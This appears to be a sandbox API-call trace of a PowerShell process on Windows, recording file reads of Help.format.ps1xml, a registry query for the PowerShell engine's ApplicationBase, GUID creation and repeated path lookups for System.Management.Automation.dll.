	[0347.632] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.632] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.633] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.633] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.633] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.633] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.634] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.634] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.634] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.634] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.634] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.635] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.635] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.635] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.007] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.007] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.010] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.010] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.010] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.010] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.011] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.011] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.011] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.011] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.011] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.011] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.012] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.012] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.012] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.012] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.012] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.012] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.013] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.013] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.013] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.013] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.013] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.013] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.013] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.014] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.014] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.014] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.014] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.014] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.014] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.015] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0348.015] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0xf37, lpOverlapped=0x0) returned 1
	[0348.015] ReadFile (in: hFile=0x328, lpBuffer=0x36c727f, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c727f*, lpNumberOfBytesRead=0xad1d8*=0x0, lpOverlapped=0x0) returned 1
	[0348.015] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x0, lpOverlapped=0x0) returned 1
	[0348.015] CloseHandle (hObject=0x328) returned 1
	[0348.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0348.015] SetErrorMode (uMode=0x1) returned 0x1
	[0348.016] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad180 | out: lpFileInformation=0xad180*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0348.016] SetErrorMode (uMode=0x1) returned 0x1
	[0348.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xaceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0348.016] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad268 | out: phkResult=0xad268*=0x328) returned 0x0
	[0348.016] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad1ec, lpData=0x0, lpcbData=0xad1e8*=0x0 | out: lpType=0xad1ec*=0x1, lpData=0x0, lpcbData=0xad1e8*=0x56) returned 0x0
	[0348.016] CoTaskMemAlloc (cb=0x5a) returned 0x27d1c0
	[0348.016] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad1bc, lpData=0x27d1c0, lpcbData=0xad1b8*=0x56 | out: lpType=0xad1bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad1b8*=0x56) returned 0x0
	[0348.016] CoTaskMemFree (pv=0x27d1c0) 
	[0348.016] RegCloseKey (hKey=0x328) returned 0x0
	[0348.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xaceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0348.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0348.030] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xa7e11cd3, Data2=0xd592, Data3=0x4abf, Data4=([0]=0x96, [1]=0xbd, [2]=0x97, [3]=0xa4, [4]=0x53, [5]=0x4d, [6]=0xf1, [7]=0x1d))) returned 0x0
	[0348.030] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x32f9a848, Data2=0x13a6, Data3=0x4da3, Data4=([0]=0x91, [1]=0xd0, [2]=0xfc, [3]=0x63, [4]=0xf3, [5]=0xf3, [6]=0x8b, [7]=0x3a))) returned 0x0
	[0348.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.684] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xd6afd865, Data2=0xecbc, Data3=0x422f, Data4=([0]=0xa6, [1]=0x8c, [2]=0x1c, [3]=0x6d, [4]=0x10, [5]=0x6b, [6]=0xce, [7]=0xf))) returned 0x0
	[0348.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
